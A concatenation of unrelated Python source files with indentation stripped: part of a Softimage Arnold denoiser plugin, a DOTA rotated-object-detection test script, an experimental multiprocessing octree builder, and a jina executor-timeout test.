Application.LogMessage('arnold_denoiser_denoise_OnClicked called', C.siVerbose)
cp = PPG.Inspected(0)
doDenoise(cp)
def frame_range_logic():
if PPG.frame_range.Value == 'Start / End':
PPG.start_frame.Enable(True)
PPG.end_frame.Enable(True)
elif PPG.frame_range.Value == 'Single Frame':
PPG.start_frame.Enable(True)
PPG.end_frame.Enable(False)
else:
PPG.start_frame.Enable(False)
PPG.end_frame.Enable(False)
def input_logic():
# convert softimage file sequnce syntax
inputFile = PPG.input.Value
if inputFile:
inputSeq = ImageSequence(inputFile)
start_frame = inputSeq.start
end_frame = inputSeq.end
PPG.start_frame.Value = start_frame
PPG.end_frame.Value = end_frame
outputSuffix = PPG.output_suffix.Value
outputSeq = ImageSequence(inputFile)
outputSeq.addFilebaseSuffix(outputSuffix)
PPG.output.Value = outputSeq.si()
else:
PPG.start_frame.Value = 0
PPG.end_frame.Value = 0
PPG.output.Value = ''
def SITOALogMessage(message, severity=C.siInfo):
loglevel = Application.GetValue("Passes.Arnold_Render_Options.log_level")
siloglevel = [C.siError, C.siWarning, C.siInfo, C.siVerbose][loglevel] # select the Softimage severity from SItoA loglevel.
if severity <= siloglevel:
# LogMessage but clamp sverity at siInfo
# This makes sure that siVerbose messages get printed regardless if Verbosity is enabled in Softimage or not
Application.LogMessage(message, min(severity, C.siInfo))
class ImageSequence(object):
si_re = re.compile(r'(.*)\[(\d+)\.{2}(\d+)(?:;(\d+))?\](.*)(\..+)')
square_re = re.compile(r'(.*?)(#+)(.*)(\..+)')
def __init__(self, path=None):
# Class that make conversions.
self.start = 0
self.end = 0
self.padding = Application.GetValue("Passes.RenderOptions.FramePadding")
self.filebase = u''
self.filehead = u''
self.ext = u''
self._creation_path = None
if path is not None:
self._creation_path = path
if self.si_re.match(path):
self.parseSiSequence()
elif self.square_re.match(path):
self.parseSquareSequence()
else:
self.parseDigitSequence()
def __repr__(self):
return 'ImageSequence(start={}, end={}, padding={}, filebase={}, filehead={}, ext={})'.format(
self.start,
self.end,
self.padding,
self.filebase,
self.filehead,
self.ext
)
def parseSiSequence(self):
re_result = self.si_re.search(self._creation_path)
padding = re_result.group(4)
if padding is None:
self.padding = 1
else:
self.padding = int(padding)
self.start = int(re_result.group(2))
self.end = int(re_result.group(3))
self.filebase = re_result.group(1)
self.filehead = re_result.group(5)
self.ext = re_result.group(6)
def parseSquareSequence(self):
re_result = self.square_re.search(self._creation_path)
self.padding = len(re_result.group(2))
self.filebase = re_result.group(1)
self.filehead = re_result.group(3)
self.ext = re_result.group(4)
begin_pos = len(self.filebase)
end_pos = begin_pos + self.padding
end_frame = start_frame = 0
globFile = self.filebase + u'[0-9]' * self.padding + self.filehead + self.ext
filesList = glob.glob(globFile) or []
for matchingFile in filesList:
frame_token = int(matchingFile[begin_pos:end_pos])
if start_frame <= 0 or frame_token < start_frame:
start_frame = frame_token
if frame_token > end_frame:
end_frame = frame_token
self.start = start_frame
self.end = end_frame
def parseDigitSequence(self):
base, ext = os.path.splitext(self._creation_path)
head_length = 0
padding = 0
for c in reversed(base):
if u'0' <= c < u'9':
padding += 1
elif padding > 0:
break # I already found numerical characters and they're finished now
elif c == os.sep:
break # don't search folders
else:
# still haven't found a numerical parameter
head_length += 1
if padding > 0:
if head_length > 0:
self.start = int(base[-(head_length+padding):-head_length])
self.filehead = base[-head_length:]
else:
self.start = int(base[-(head_length+padding):])
self.filehead = u''
self.end = self.start
self.padding = padding
self.filebase = base[:-(head_length+padding)]
self.ext = ext
else:
self.padding = 0
self.filebase = base
self.ext = ext
def si(self):
if self.start == self.end:
# if start = end, return the single frame
return self.frame(self.start)
if self.padding > 1:
return u'{}[{}..{};{}]{}{}'.format(self.filebase, self.start, self.end, self.padding, self.filehead, self.ext)
else:
return u'{}[{}..{}]{}{}'.format(self.filebase, self.start, self.end, self.filehead, self.ext)
def squares(self):
if self.start == self.end:
# if start = end, return the single frame
return self.frame(self.start)
return (u'{}' + u'#' * max(self.padding, 1) + '{}{}').format(self.filebase, self.filehead, self.ext)
def frame(self, frame):
if self.padding > 0:
return (u'{}{:0' + str(self.padding) + u'd}{}{}').format(self.filebase, frame, self.filehead, self.ext)
else:
return (self.filebase + self.filehead + self.ext)
def addFilebaseSuffix(self, suffix):
if self.filebase[-1] in u'._':
new_filebase = self.filebase[:-1]
new_filebase += suffix
new_filebase += self.filebase[-1:]
else:
new_filebase = self.filebase + suffix
self.filebase = new_filebase
def doDenoise(cp):
inFileStr = cp.input.Value
outputSuffix = cp.output_suffix.Value
if inFileStr == '':
XSIUIToolkit.MsgBox('An input file must be selected', C.siMsgOkOnly, 'Arnold Denoiser')
return False
if outputSuffix == '':
XSIUIToolkit.MsgBox('Output suffix can\'t be empty', C.siMsgOkOnly, 'Arnold Denoiser')
return False
inFileStr = XSIUtils.Linktab.ResolvePath(inFileStr)
inSeq = ImageSequence(inFileStr)
outSeq = ImageSequence(inFileStr)
outSeq.addFilebaseSuffix(outputSuffix)
start_frame = cp.start_frame.Value
frame_range = cp.frame_range.Value
if frame_range == u'Single Frame':
end_frame = start_frame
elif frame_range == u'Start / End':
end_frame = cp.end_frame.Value
if end_frame < start_frame:
XSIUIToolkit.MsgBox('End Frame can\'t be before Start Frame', C.siMsgOkOnly, 'Arnold Denoiser')
return False
else: # complete sequence, need to check on disk all the existing input files
start_frame, end_frame = inSeq.start, inSeq.end
temporal_frames = cp.temporal_frames.Value
pixel_search_radius = cp.pixel_search_radius.Value
pixel_patch_radius = cp.pixel_patch_radius.Value
variance = cp.variance.Value
light_group_aovs = cp.light_group_aovs.Value
runDenoise(start_frame, end_frame, inSeq, outSeq, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs)
return True
def runDenoise(start_frame, end_frame, inSeq, outSeq, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs):
pb = XSIUIToolkit.ProgressBar
pb.Caption = 'Denoising ...'
pb.Maximum = int(end_frame) - int(start_frame) + 1
pb.Visible = True
pb.StatusText = '{}/{}'.format(0, pb.Maximum)
run = True
f = start_frame
while run and f <= end_frame:
inFile = inSeq.frame(f)
outFile = outSeq.frame(f)
if os.path.isfile(inFile):
SITOALogMessage('[sitoa] Denoising image {} '.format(inFile))
t = threading.Thread(target=denoiseImage, args=(inFile, outFile, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs))
t.start()
while t.is_alive():
if pb.CancelPressed:
run = False
SITOALogMessage('[sitoa] Stopping Arnold Denoiser after the current frame is done...')
Application.Desktop.RedrawUI()
sleep(0.01) # just to limit the RedrawUI a bit.
else:
if not run:
SITOALogMessage('[sitoa] Arnold Denoiser has stopped.')
else:
SITOALogMessage('[sitoa] Arnold Denoiser: Could not find input file {} '.format(inFile), C.siError)
i = pb.Increment()
pb.StatusText = '{}/{}'.format(i, pb.Maximum)
f += 1
else:
if run:
SITOALogMessage('[sitoa] Arnold Denoiser has finished.')
def denoiseImage(inFile, outFile, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs):
noice_binary = os.path.join(os.path.dirname(Application.Plugins('Arnold Render').Filename), 'noice')
if sys.platform == 'win32':
noice_binary += '.exe'
cmd = [noice_binary]
cmd += ['-i', inFile, '-o', outFile]
cmd += ['-ef', str(temporal_frames), '-sr', str(pixel_search_radius), '-pr', str(pixel_patch_radius), '-v', str(variance)]
if len(light_group_aovs) > 0:
light_group_split = light_group_aovs.split(' ')
for light_group in light_group_split:
cmd += ['-l', light_group]
SITOALogMessage('[sitoa] Starting Arnold Denoiser with command: ' + subprocess.list2cmdline(cmd), C.siVerbose)
res = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=_no_window).communicate()[0]
SITOALogMessage(res, C.siVerbose)
|
demo.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import os
from multiprocessing import Queue, Process
import cv2
import numpy as np
import tensorflow as tf
from alpharotate.libs.utils.coordinate_convert import forward_convert, backward_convert
from alpharotate.libs.utils.draw_box_in_img import DrawBox
from alpharotate.libs.utils.rotate_polygon_nms import rotate_gpu_nms
from tqdm import tqdm
from alpharotate.libs.label_name_dict.label_dict import LabelMap
from alpharotate.utils.pretrain_zoo import PretrainModelZoo
from alpharotate.utils import tools
def parse_args():
parser = argparse.ArgumentParser('Start testing.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
parser.add_argument('--flip_img', '-f', default=False,
action='store_true')
parser.add_argument('--num_imgs', dest='num_imgs',
help='test image number',
default=np.inf, type=int)
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=1200, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=1200, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=50, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=50, type=int)
args = parser.parse_args()
return args
class TestDOTA(object):
def __init__(self, cfgs):
self.cfgs = cfgs
self.args = parse_args()
label_map = LabelMap(cfgs)
self.name_label_map, self.label_name_map = label_map.name2label(), label_map.label2name()
def worker(self, gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
pretrain_zoo = PretrainModelZoo()
if self.cfgs.NET_NAME in pretrain_zoo.pth_zoo or self.cfgs.NET_NAME in pretrain_zoo.mxnet_zoo:
img_batch = (img_batch / 255 - tf.constant(self.cfgs.PIXEL_MEAN_)) / tf.constant(self.cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(self.cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
img_id = int(img_path.split('/')[-1].split('.')[0])
if img_id in range(0, 843) or img_id in range(3453, 4631) or img_id in range(5751, 7174):
continue
# if '2750' not in img_path:
# continue
img = cv2.imread(img_path)
# img = np.load(img_path.replace('images', 'npy').replace('.png', '.npy'))
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
img_short_side_len_list = self.cfgs.IMG_SHORT_SIDE_LEN if isinstance(self.cfgs.IMG_SHORT_SIDE_LEN, list) else [
self.cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not self.args.multi_scale else img_short_side_len_list
if imgH < self.args.h_len:
temp = np.zeros([self.args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = self.args.h_len
if imgW < self.args.w_len:
temp = np.zeros([imgH, self.args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = self.args.w_len
for hh in range(0, imgH, self.args.h_len - self.args.h_overlap):
if imgH - hh - 1 < self.args.h_len:
hh_ = imgH - self.args.h_len
else:
hh_ = hh
for ww in range(0, imgW, self.args.w_len - self.args.w_overlap):
if imgW - ww - 1 < self.args.w_len:
ww_ = imgW - self.args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + self.args.h_len), ww_:(ww_ + self.args.w_len), :]
for short_size in img_short_side_len_list:
max_len = self.cfgs.IMG_MAX_LENGTH
if self.args.h_len < self.args.w_len:
new_h, new_w = short_size, min(int(short_size * float(self.args.w_len) / self.args.h_len), max_len)
else:
new_h, new_w = min(int(short_size * float(self.args.h_len) / self.args.w_len), max_len), short_size
img_resize = cv2.resize(src_img, (new_w, new_h))
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
if self.args.flip_img:
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=1)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = (src_w - box_rotate[0::2]) + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=0)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = (src_h - box_rotate[1::2]) + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.2, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3,
'container-crane': 0.05, 'airport': 0.1, 'helipad': 0.1}
for sub_class in range(1, self.cfgs.CLASS_NUM + 1):
if self.label_name_map[sub_class] not in ['small-vehicle']:
continue
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
# try:
# inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
# scores=np.array(tmp_score_r),
# iou_threshold=threshold[self.label_name_map[sub_class]],
# max_output_size=5000)
#
# except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[self.label_name_map[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(self, det_net, real_test_img_list, txt_name):
save_path = os.path.join('./test_dota', self.cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(self.args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(5000)
procs = []
for i, gpu_id in enumerate(self.args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=self.worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if self.args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.makedirs(os.path.join(save_path, 'demo_img_vis'))
draw_path = os.path.join(save_path, 'demo_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_boxes = backward_convert(res['boxes'], with_label=False)
detected_indices = res['scores'] >= 0.1
detected_scores = res['scores'][detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = res['labels'][detected_indices]
drawer = DrawBox(self.cfgs)
final_detections = drawer.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
is_csl=True,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = self.name_label_map.keys()
write_handle = {}
tools.makedirs(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
for i, rbox in enumerate(res['boxes']):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[self.label_name_map[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def get_test_image(self):
txt_name = '{}.txt'.format(self.cfgs.VERSION)
if not self.args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if self.args.num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: self.args.num_imgs]
return real_test_img_list
|
test4.py
|
''' Attempting to write an octree in python
I want this to work with VERY large data sets that can't be stored fully in memory. So my procedure will be as follows:
- need to read in line-by-line and clear memory every X MB (or maybe every X particles;can I check memory load in python?)
- go down to nodes with containing N particles
- need to write out tree with node sizes and centers and also ending nodes with actual particles
'''
import os
import numpy as np
import json
import h5py
import random
from multiprocessing import Process, Manager
#https://stackoverflow.com/questions/56250514/how-to-tackle-with-error-object-of-type-int32-is-not-json-serializable
#to help with dumping to json
class npEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.int32):
return int(obj)
return json.JSONEncoder.default(self, obj)
class octreeStream:
def __init__(self, inputFile, NMemoryMax = 1e5, NNodeMax = 5000,
header = 0, delim = None, colIndices = {'Coordinates':[0,1,2]},
baseDir = 'octreeNodes', Nmax=np.inf, verbose=0, path = None, minWidth=0,
h5PartKey = '', keyList = ['Coordinates'], center = None, cleanDir = False,
Ncores=1):
'''
inputFile : path to the file. For now only text files.
NMemoryMax : the maximum number of particles to save in the memory before writing to a file
NNodeMax : the maximum number of particles to store in a node before splitting it
header : the line number of the header (file starts at line 1,
set header=0 for no header, and in that case x,y,z are assumed to be the first three columns)
delim : the delimiter between columns, if set to None, then hdf5 file is assumed
colIndices : dict with the column numbers for each value in keyList (only necessary for csv files)
baseDir : the directory to store the octree files
Nmax : maximum number of particles to include
verbose : controls how much output to write to the console
path : the path to the output file
minWidth : the minimum width that a node can have
h5PartKey : if needed, can be used to specify which particle type to use, e.g. 'PartType0'
keyList : Any additional keys that are desired; MUST contain the key to Coordinates first. If blank, then assume that x,y,z is the first 3 columns in file
center : options for the user to provide the octree center (can save time)
cleanDir : if true this will erase the files within that directory before beginning
Ncores : number of cores for multiprocessing
'''
self.nodes = Manager().list() #will contain a list of all nodes with each as a dict
self.managerDict = Manager().dict()
self.managerDict['inputFile'] = inputFile
self.managerDict['NMemoryMax'] = NMemoryMax
self.managerDict['NNodeMax'] = NNodeMax
self.managerDict['header'] = header
self.managerDict['delim'] = delim
self.managerDict['colIndices'] = colIndices
self.managerDict['minWidth'] = minWidth
self.managerDict['h5PartKey'] = h5PartKey
self.managerDict['keyList'] = keyList
self.managerDict['center'] = center
self.managerDict['Nmax'] = Nmax
self.managerDict['cleanDir'] = cleanDir
self.managerDict['Ncores'] = Ncores
self.managerDict['verbose'] = verbose
if (path is None):
self.managerDict['path'] = os.path.join(os.getcwd(), baseDir)
else:
self.managerDict['path'] = os.path.abspath(path) #to make this windows safe
print('files will be output to:', self.managerDict['path'])
self.managerDict['count'] = 0
self.managerDict['lineN'] = 0
self.managerDict['arr'] = None #will contain the data from the file
self.managerDict['width'] = None #will be determined in getSizeCenter
def createNode(self, center, id='', width=0,):
#node = Manager().dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=Manager().list(), childNodes=Manager().list(), particles=Manager().list(), needsUpdate=True)
node = Manager().dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=[], childNodes=[], particles=[], needsUpdate=True)
#node = dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=Manager().list(), childNodes=Manager().list(), particles=Manager().list(), needsUpdate=True)
self.nodes += [node]
print('CHECKING NEW NODE', self.nodes[-1])
return (node, len(self.nodes) - 1)
def findClosestNodeIndexByDistance(self, point, positions):
#there is probably a faster and more clever way to do this
#print('checking dist', point.shape, positions.shape, point, positions)
dist2 = np.sum((positions - point)**2, axis=1)
return np.argmin(dist2)
def findClosestNode(self, point, parentIndex=None):
#I am going to traverse the octree to find the closest node
if (parentIndex is None):
parentIndex = 0
print('CHECKING HERE', parentIndex, self.nodes, len(self.nodes))
for i,n in enumerate(self.nodes):
print('PRINTING', i, n)
parent = self.nodes[parentIndex]
print('checking again', parent['width'])
childIndices = parent['childNodes']
while (childIndices != []):
childPositions = []
for i in childIndices:
childPositions.append([self.nodes[i]['x'], self.nodes[i]['y'], self.nodes[i]['z']])
parentIndex = childIndices[self.findClosestNodeIndexByDistance(point[0:3], np.array(childPositions))]
parent = self.nodes[parentIndex]
childIndices = parent['childNodes']
return (parent, parentIndex)
def initialize(self):
self.managerDict['count'] = 0
#create the output directory if needed
if (not os.path.exists(self.managerDict['path'])):
os.makedirs(self.managerDict['path'])
#remove the files in that directory
if (self.managerDict['cleanDir']):
for f in os.listdir(self.managerDict['path']):
os.remove(os.path.join(self.managerDict['path'], f))
#create the base node
(n, index) = self.createNode(self.managerDict['center'], '0', width=self.managerDict['width'])
#for some reason when running with multiprocessing, I need to return a value here. Maybe this is way to make python wait for this to complete before moving on?
return (n, index)
def addPointToOctree(self, point):
#find the node that it belongs in
node, index = self.findClosestNode(np.array(point))
if (self.managerDict['verbose'] > 2):
print('id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'], point)
#add the particle to the node
self.nodes[index]['particles'] += [point]
self.nodes[index]['needsUpdate'] = True
self.nodes[index]['Nparticles'] += 1
if (self.managerDict['verbose'] > 2):
print('After, id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'])
#check if we need to split the node
if (node['Nparticles'] >= self.managerDict['NNodeMax'] and node['width'] >= self.managerDict['minWidth']*2):
self.createChildNodes(index)
def test(self, index):
print('BEFORE',self.nodes[index]['Nparticles'], self.nodes[index]['childNodes'])
self.nodes[index]['Nparticles'] += 1
self.nodes[index]['childNodes'] += [index]
print('AFTER',self.nodes[index]['Nparticles'], self.nodes[index]['childNodes'])
def compileOctree(self, inputFile=None, append=False):
#initialize a few things
if (not append):
self.managerDict['center'] = [0,0,0]
self.managerDict['width'] = 1000
_ = self.initialize()
# if (inputFile is None):
# inputFile = self.managerDict['inputFile']
# #open the input file
# if (self.managerDict['delim'] is None):
# #assume this is a hdf5 file
# file = h5py.File(os.path.abspath(inputFile), 'r')
# arr = file
# if (self.managerDict['h5PartKey'] != ''):
# arrPart = arr[self.managerDict['h5PartKey']]
# #now build the particle array
# for i, key in enumerate(self.managerDict['keyList']):
# if (i == 0):
# arr = np.array(arrPart[key]) #Coordinates are always first
# else:
# addOn = np.array(arrPart[key])
# arrLen = 1
# if (key == 'Velocities'): #requires special handling because it is a 2D array
# arrLen = 3
# arr = np.hstack((arr, np.reshape(addOn, (len(arr),arrLen))))
# else:
# #for text files
# file = open(os.path.abspath(inputFile), 'r') #abspath converts to windows format
# arr = file
# self.managerDict['Nmax'] = min(self.managerDict['Nmax'], arr.shape[0])
ntest = 1
jobs = []
for i in range(ntest):
center = [i,i,i]
iden = 'test' + str(i)
width = i*100
jobs.append(Process(target=self.test, args=(0,)))
#jobs.append(Process(target=self.addToNodes, args=(center, iden, width,)))
#jobs.append(Process(target=self.findClosestNode, args=(center,)))
for j in jobs:
j.start()
print('joining')
for j in jobs:
j.join()
#self.iterFileOctree(arr)
#file.close()
print('done', self.nodes)
def iterFileOctree(self, arr):
#begin the loop to read the file line-by-line
iStart = self.managerDict['header'];
self.managerDict['lineN'] = iStart
while self.managerDict['lineN'] < self.managerDict['Nmax']:
jobs = []
for i in range(self.managerDict['Ncores']):
iEnd = int(np.floor(min(iStart + self.managerDict['NMemoryMax']/self.managerDict['Ncores'], self.managerDict['Nmax'])))
print(iStart, iEnd, self.managerDict['lineN'], arr.shape[0])
if (iStart >= iEnd):
break
j = Process(target=self.iterLinesOctree, args=(arr[iStart:iEnd], ))
jobs.append(j)
iStart = iEnd
if (iEnd >= arr.shape[0]):
break
print('starting jobs', len(jobs), self.managerDict['lineN'], iEnd, self.managerDict['Nmax'])
for j in jobs:
j.start()
print('joining jobs')
for j in jobs:
j.join()
self.managerDict['lineN'] = 2.*self.managerDict['Nmax']
def iterLinesOctree(self, arr):
print("checking",arr.shape[0])
for i in range(arr.shape[0]):
line = arr[i]
self.managerDict['lineN'] += 1
self.managerDict['count'] += 1
#get the x,y,z from the line
if (self.managerDict['delim'] is None):
point = line
else:
lineStrip = line.strip().split(self.managerDict['delim'])
point = []
for key in self.managerDict['keyList']:
indices = self.managerDict['colIndices'][key]
if (type(indices) is not list):
indices = [indices]
for ii in indices:
point.append(float(lineStrip[ii]))
self.addPointToOctree(point)
if (self.managerDict['verbose'] > 0 and (self.managerDict['lineN'] % 100000 == 0)):
print('line : ', self.managerDict['lineN'])
if __name__ == '__main__':
oM1 = octreeStream('/Users/ageller/VISUALIZATIONS/FIREdata/m12i_res7100/snapdir_600/snapshot_600.0.hdf5',
h5PartKey = 'PartType0', keyList = ['Coordinates', 'Density', 'Velocities'],
NNodeMax = 10000, NMemoryMax = 5e4, Nmax=1e5, verbose=3, minWidth=1e-4,
cleanDir = True,
path='/Users/ageller/VISUALIZATIONS/octree_threejs_python/WebGL_octreePartition/src/data/junk/octreeNodes/Gas')
oM1.compileOctree()
|
test_executor_timeout_failures.py
|
import multiprocessing
import time
import pytest
from jina import Client, Document, Executor, Flow, requests
class SlowExecutor(Executor):
@requests
def foo(self, *args, **kwargs):
time.sleep(0.2)
def _test_error(flow_kwargs, add_kwargs, error_port=None):
f = Flow(**flow_kwargs).add(**add_kwargs)
with f:
with pytest.raises(ConnectionError) as err_info:
f.index(inputs=[])
if error_port:
assert str(error_port) in err_info.value.args[0]
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_headless_exec_timeout(port_generator, protocol):
exec_port = port_generator()
flow_kwargs = {'timeout_send': 1, 'protocol': protocol}
add_kwargs = {'uses': SlowExecutor, 'port': exec_port}
# we have to do this in a new process because otherwise grpc will be sad and everything will crash :(
p = multiprocessing.Process(
target=_test_error, args=(flow_kwargs, add_kwargs, exec_port)
)
p.start()
p.join()
assert (
p.exitcode == 0
) # if exitcode != 0 then test in other process did not pass and this should fail
